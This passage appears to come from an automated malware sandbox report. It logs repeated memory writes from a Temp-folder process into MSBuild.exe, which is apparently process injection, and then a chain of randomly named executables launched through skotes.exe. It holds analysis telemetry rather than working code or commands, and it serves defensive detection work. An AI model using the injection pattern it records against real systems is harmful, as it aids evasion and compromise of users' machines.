Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7E2C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7E90
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7EF4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7F58
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7FBC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8020
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8084
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC80E8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC814C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC81B0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8214
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8278
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC82DC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8340
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC83A4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8408
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC846C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC84D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8534
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8598
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC85FC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8660
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC86C4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8728
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC878C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC87F0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8854
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC88B8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC891C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8980
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC89E4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8A48
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8AAC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8B10
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8B74
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8BD8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8C3C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8CA0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8D04
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8D68
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8DCC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8E30
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8E94
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8EF8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8F5C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8FC0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9024
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9088
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC90EC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9150
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC91B4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9218
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC927C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC92E0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9344
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC93A8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC940C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9470
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC94D4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9538
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC959C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9600
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9664
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC96C8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC972C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9790
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC97F4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9858
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC98BC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9920
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9984
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC99E8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9A4C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9AB0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9B14
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9B78
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9BDC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9C40
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9CA4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9D08
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9D6C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9DD0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9E34
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9E98
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9EFC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9F60
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9FC4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA028
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA08C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA0F0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA154
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA1B8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA21C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA280
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA2E4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA348
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA3AC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA410
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA474
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA4D8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA53C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA5A0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA604
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA668
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA6CC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA730
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA794
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA7F8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA85C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA8C0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA924
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA988
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCA9EC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAA50
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAAB4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAB18
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAB7C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCABE0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAC44
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCACA8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAD0C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAD70
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCADD4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAE38
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAE9C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAF00
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAF64
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCAFC8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB02C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB090
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB0F4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB158
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB1BC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB220
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB284
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB2E8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB34C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB3B0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB414
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB478
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB4DC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB540
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB5A4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB608
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB66C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB6D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB734
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB798
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB7FC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB860
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB8C4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB928
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB98C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCB9F0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBA54
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBAB8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBB1C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBB80
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBBE4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBC48
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBCAC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBD10
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBD74
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBDD8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBE3C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBEA0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBF04
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBF68
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCBFCC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCC030
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCC094
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCC0F8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCC15C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCC1C0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCC224
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCC288
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BCC2EC

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe "C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe "C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe "C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe"	Jump to behavior
